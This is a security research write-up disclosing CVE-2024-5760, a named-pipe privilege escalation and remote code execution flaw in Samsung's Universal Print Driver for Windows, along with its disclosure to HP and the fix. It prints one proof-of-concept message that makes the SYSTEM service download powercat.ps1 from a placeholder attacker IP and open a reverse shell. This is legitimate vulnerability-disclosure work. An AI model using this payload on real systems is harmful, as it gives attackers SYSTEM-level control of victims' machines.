October 29, 2024


Episode 16


CVE-2024-5760: LPE + RCE in Samsung’s Universal Print Driver for Windows 


Authors: Matthew Bianchi and Hahna Kane Latonick

Introduction

Dark Wolf Solutions recently disclosed to HP Inc. (“HP”) a vulnerability associated with the Samsung Universal Print Driver (UPD) for Windows, running software version V3.00.16.0101 and earlier, that results in local privilege escalation (LPE) and allows for remote code execution (RCE). The Samsung UPD can communicate with many different Samsung printer models without needing to install individual printer-specific drivers for each model. HP continues to support the use of their Windows drivers to help users efficiently connect both HP and Samsung printers to their Windows devices.

Target Analysis

The Samsung Xpress SL-M2070FW Laser Multifunction Printer (Figure 1) uses the Samsung UPD and provides fast high-resolution printing, AirPrint for direct wireless printing, and Wi-Fi Protected Setup (WPS) for connecting the printer to a wireless network.

On the printer’s product page, the Samsung UPD is among a collection of drivers available for download. Once installed, the driver properties can be accessed through the Windows Control Panel. Figure 2 below shows the device options menu for the Samsung UPD and the associated printer.

CVE-2024-5760 Vulnerability

The Samsung UPD installs a service called SecUPDUtilSvc.exe, which gets set to autorun in the background on your Windows machine and exposes a named pipe called SamsungUPDUtilPipe. By default, this service has administrative permissions and can launch programs, edit the Windows registry, and copy files as SYSTEM. Dark Wolf Solutions discovered that the exposed named pipe can be accessed by a non-privileged user, allowing an attacker the ability to directly open the pipe and utilize its read/write/execute capabilities with elevated privileges. In addition, remote code execution can be achieved. Our proof-of-concept (PoC) causes the vulnerable service to download and execute a Powershell script that connects to a listening process on a Linux host, creating a reverse shell that allows the attacker on the Linux host to execute commands as NT AUTHORITY\SYSTEM on the Windows host. This vulnerability was assigned CVE-2024-5760 by HP on September 11, 2024 with a 8.4 severity score.

To evaluate this vulnerability, we used Process Explorer from the Sysinternals application package to verify that SecUPDUtilSvc.exe had SYSTEM level privileges and was being set to autorun. As shown in Figure 3, we also used IO Ninja to monitor any data being transmitted or received by the SamsungUPDUtilPipe, which was vital during the creation of our PoC.


We identified slight limitations throughout the process of developing the PoC. For example, our PoC would need to be directly executed on the target’s machine, requiring local access. Additionally, the target machine would need to have internet access as our PoC calls out to the attacker’s machine during the exploitation process. Nonetheless, we made sure to account for these constraints when developing the exploit.

Exploiting CVE-2024-5760

Our goal after discovering the privilege escalation vulnerability was to create a PoC that established a handle to the SamsungUPDUtilPipe and created a reverse shell. Our PoC was primarily inspired by the official Named Pipe Client example written by Microsoft within their Windows App Development API. We modified it to reflect our pipe’s name and changed lpvMessage to direct SecUPDUtilSvc to send the following message to the pipe server:

lpvMessage(L"@=RunAndWaitAsSvc\ncommandLine=cmd.exe /K powershell -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://<Attacker IP>/powercat.ps1'); powercat -c <Attacker IP> -p 4444 -e cmd\"");

On our attacker machine running Ubuntu 22.04 LTS, we ran an HTTP server alongside a netcat listener to catch any incoming HTTP requests. Once the attacker machine was in its ready state, we executed our PoC binary on the victim’s Windows 10 machine, which then proceeded to download powercat.ps1, and finally connected to our netcat listener. After establishing our reverse shell, we were then able to execute commands as NT AUTHORITY\SYSTEM on the Windows host, as seen below in Figure 4.

Conclusion

After disclosing this issue to HP, they addressed the vulnerability and released an updated Samsung Universal Print Driver with an incremented version number of V3.00.16.0101:01. Their latest driver version no longer installs the SecUPDUtilSvc executable and removes any existing instances of SecUPDUtilSvc.exe. HP also published a security bulletin describing the reported vulnerability and their recommended remediation guidance, advising users to update their printer software and drivers by going to the HP Customer Support - Software and Driver Downloads page and searching for your printer model.